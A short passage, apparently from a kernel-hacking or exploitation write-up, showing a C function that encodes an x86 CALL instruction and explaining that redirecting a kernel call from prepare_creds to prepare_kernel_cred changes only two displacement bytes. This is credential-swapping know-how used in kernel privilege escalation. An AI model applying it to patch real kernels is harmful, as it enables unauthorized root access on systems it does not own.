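/* Encodes the instruction: opcode 0xe8 followed by little-endian rel32. */
void encode_call(uint8_t out[5], uint64_t call_addr, uint64_t target)
{
    uint32_t rel = (uint32_t)call_rel32(call_addr, target);

    out[0] = 0xe8;
    out[1] = (uint8_t)(rel & 0xff);
    out[2] = (uint8_t)((rel >> 8) & 0xff);
    out[3] = (uint8_t)((rel >> 16) & 0xff);
    out[4] = (uint8_t)((rel >> 24) & 0xff);
}
```

For the call at 0xffffffff81031f75, the displacement goes from 0x7d31 (prepare_creds) to 0x7f2c (prepare_kernel_cred), so only the two bytes right after the opcode change.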